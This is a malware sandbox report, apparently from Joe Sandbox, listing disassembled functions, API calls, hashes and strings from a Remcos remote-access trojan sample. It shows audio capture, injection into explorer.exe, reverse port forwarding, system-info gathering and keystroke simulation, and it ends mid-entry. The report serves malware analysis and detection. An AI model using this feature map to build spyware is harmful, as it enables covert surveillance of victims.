                                                      • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                      • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                      • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                      APIs
                                                      • _free.LIBCMT ref: 004481B5
                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                      • _free.LIBCMT ref: 004481C1
                                                      • _free.LIBCMT ref: 004481CC
                                                      • _free.LIBCMT ref: 004481D7
                                                      • _free.LIBCMT ref: 004481E2
                                                      • _free.LIBCMT ref: 004481ED
                                                      • _free.LIBCMT ref: 004481F8
                                                      • _free.LIBCMT ref: 00448203
                                                      • _free.LIBCMT ref: 0044820E
                                                      • _free.LIBCMT ref: 0044821C
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                      • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                      • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                      • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Eventinet_ntoa
                                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                      • API String ID: 3578746661-3604713145
                                                      • Opcode ID: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                                      • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                      • Opcode Fuzzy Hash: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                                      • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                      • API String ID: 3527080286-3064271455
                                                      • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                      • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                      • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                      • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                      • __fassign.LIBCMT ref: 0044B4F9
                                                      • __fassign.LIBCMT ref: 0044B514
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
                                                      • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID: PkGNG
                                                      • API String ID: 1324828854-263838557
                                                      • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                      • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                      • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                      • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                        • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                      • Sleep.KERNEL32(00000064), ref: 0041755C
                                                      • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateDeleteExecuteShellSleep
                                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                      • API String ID: 1462127192-2001430897
                                                      • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                      • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                      • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                      • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 004074D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentProcess
                                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                      • API String ID: 2050909247-4242073005
                                                      • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                      • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                      • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                      • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                      APIs
                                                      • _strftime.LIBCMT ref: 00401D50
                                                        • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                      • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                      • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                      • API String ID: 3809562944-243156785
                                                      • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                      • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                      • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                      • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                      • int.LIBCPMT ref: 00410EBC
                                                        • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                        • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                      • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                      • __Init_thread_footer.LIBCMT ref: 00410F64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                      • String ID: ,kG$0kG
                                                      • API String ID: 3815856325-2015055088
                                                      • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                      • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                      • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                      • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                      APIs
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                      • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                      • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                      • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                      • waveInStart.WINMM ref: 00401CFE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                      • String ID: dMG$|MG$PG
                                                      • API String ID: 1356121797-532278878
                                                      • Opcode ID: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                                      • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                      • Opcode Fuzzy Hash: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                                      • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                        • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                        • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                        • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                      • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                      • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                      • TranslateMessage.USER32(?), ref: 0041D57A
                                                      • DispatchMessageA.USER32(?), ref: 0041D584
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                      • String ID: Remcos
                                                      • API String ID: 1970332568-165870891
                                                      • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                      • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                      • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                      • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                      • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                      • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                      • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                      APIs
                                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                      • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                      • __alloca_probe_16.LIBCMT ref: 00454014
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                      • __freea.LIBCMT ref: 00454083
                                                      • __freea.LIBCMT ref: 0045408F
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                      • String ID:
                                                      • API String ID: 201697637-0
                                                      • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                      • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                      • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                      • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                      APIs
                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                      • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                      • _free.LIBCMT ref: 00445515
                                                      • _free.LIBCMT ref: 0044552E
                                                      • _free.LIBCMT ref: 00445560
                                                      • _free.LIBCMT ref: 00445569
                                                      • _free.LIBCMT ref: 00445575
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                      • String ID: C
                                                      • API String ID: 1679612858-1037565863
                                                      • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                      • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                      • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                      • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tcp$udp
                                                      • API String ID: 0-3725065008
                                                      • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                      • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                      • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                      • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 004018BE
                                                      • ExitThread.KERNEL32 ref: 004018F6
                                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                        • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                      • String ID: PkG$XMG$NG$NG
                                                      • API String ID: 1649129571-3151166067
                                                      • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                      • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                      • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                      • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                        • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                        • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                      • String ID: .part
                                                      • API String ID: 1303771098-3499674018
                                                      • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                      • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                      • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                      • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                      APIs
                                                      • SendInput.USER32 ref: 00419A25
                                                      • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                      • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                      • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                        • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InputSend$Virtual
                                                      • String ID:
                                                      • API String ID: 1167301434-0
                                                      • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                      • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                      • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                      • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16_free
                                                      • String ID: a/p$am/pm$h{D
                                                      • API String ID: 2936374016-2303565833
                                                      • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                      • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                      • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                      • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                      APIs
                                                        • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                      • _free.LIBCMT ref: 00444E87
                                                      • _free.LIBCMT ref: 00444E9E
                                                      • _free.LIBCMT ref: 00444EBD
                                                      • _free.LIBCMT ref: 00444ED8
                                                      • _free.LIBCMT ref: 00444EEF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$AllocateHeap
                                                      • String ID: KED
                                                      • API String ID: 3033488037-2133951994
                                                      • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                      • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                      • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                      • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                      APIs
                                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Enum$InfoQueryValue
                                                      • String ID: [regsplt]$xUG$TG
                                                      • API String ID: 3554306468-1165877943
                                                      • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                      • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                      • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                      • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                                        • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                        • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                                      Strings
                                                      Memory Dump Source
